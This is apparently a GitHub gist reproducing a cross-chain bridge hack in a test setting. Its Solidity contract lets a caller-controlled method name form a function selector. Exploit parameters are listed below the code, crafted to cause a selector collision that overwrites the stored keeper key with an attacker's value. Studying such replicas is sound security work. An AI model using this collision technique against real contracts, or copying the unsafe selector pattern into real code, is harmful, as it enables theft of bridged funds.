Created
May 2, 2022 17:10
-
-
Save atlaschiew/66a2abf9a9f7dfc3fb99e7f904cecc57 to your computer and use it in GitHub Desktop.
Test Polygon Hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pragma solidity ^0.8.0; | |
| contract Data { | |
| bytes public ConKeepersPkBytes; | |
| address public caller; | |
| modifier onlyOwner { | |
| require(msg.sender == caller, "onlyOwner"); | |
| _; | |
| } | |
| constructor(address _caller) { | |
| caller = _caller; | |
| } | |
| // Store Consensus book Keepers Public Key Bytes | |
| function putCurEpochConPubKeyBytes(bytes memory curEpochPkBytes) public onlyOwner returns (bool) { | |
| ConKeepersPkBytes = curEpochPkBytes; | |
| return true; | |
| } | |
| // Get Consensus book Keepers Public Key Bytes | |
| function getCurEpochConPubKeyBytes() public view returns (bytes memory) { | |
| return ConKeepersPkBytes; | |
| } | |
| } | |
| contract Main { | |
| Data public data; | |
| struct CallResult { | |
| bool success; | |
| bytes returnData; | |
| } | |
| constructor() { | |
| data = new Data(address(this)); | |
| } | |
| function getCurEpochConPubKeyBytes() public view returns (bytes memory) { | |
| return data.getCurEpochConPubKeyBytes(); | |
| } | |
| function compromise(address _toContract,bytes memory _method, bytes memory _args, bytes memory _fromContractAddr, uint64 _fromChainId) public returns (CallResult memory) { | |
| bytes memory returnData; | |
| bool success; | |
| (success, returnData) = _toContract.call(abi.encodePacked(bytes4(keccak256(abi.encodePacked(_method, "(bytes,bytes,uint64)"))), abi.encode(_args, _fromContractAddr, _fromChainId))); | |
| // Ensure the executation is successful | |
| require(success == true, "EthCrossChain call business contract failed"); | |
| CallResult memory callResult; | |
| callResult.success = success; | |
| callResult.returnData = returnData; | |
| return callResult; | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
call compromise
_toContract: 0xD3e2008b4Da2cD6DEAF73471590fF30C86778A48 (address of data contract)
_method : 0x66756e633130343837393837383734323630363035393638 (make hash collision happen, and trigger putCurEpochConPubKeyBytes(...))
_args : 0x786978696775616967756169 (hacker's keeper address)
_fromContractAddr: 0x0000000000000000000000000000000000000000 (not important)
_fromChainId: 0 (not important)